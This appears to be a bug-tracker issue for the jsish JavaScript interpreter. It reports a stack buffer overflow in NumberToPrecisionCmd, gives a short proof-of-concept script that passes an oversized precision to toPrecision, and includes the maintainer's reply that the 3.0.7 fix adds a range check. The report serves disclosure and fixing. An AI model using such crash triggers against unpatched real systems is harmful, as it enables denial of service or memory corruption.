stack overflow

[bird8693]

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

try {
    var __num = 11.001002;
    var PyeA = __num.toString(__num);
    var ZTZe = __num.toExponential(__num);
    var AkBW = __num.toPrecision(~_num);
    var tpWc = __num.toExponential(__num);
    var MPKY = __num.toExponential(__num);
} catch (ex) {
    sputnikException = ex;
}
var successfullyParsed = true;

vulnerability description:

~ _num as a parameter, that is, precision. _num is an undefined variable, jsish thinks it is 0 by default, then the negation will become 0x7fffffff. In the analysis of the function NumberToPrecisionCmd(src/jsiNumber.c ), Jsi_GetIntFromValue is used to obtain the precision, which is the prec variable. But buf is a buffer on the stack of only 100 bytes. When prec exceeds 100, it causes a buffer overflow.

[pcmacdon]

Should be fixed in "3.0.7".

Issue only appeared when not in strict mode. ie. did not see this when the test file ends in ".jsi".
Still a good find, and we now check prec is in 1-100 range. Also generally eliminated hardcoding of num buf sizes. Also fixed try/catch error not being reported.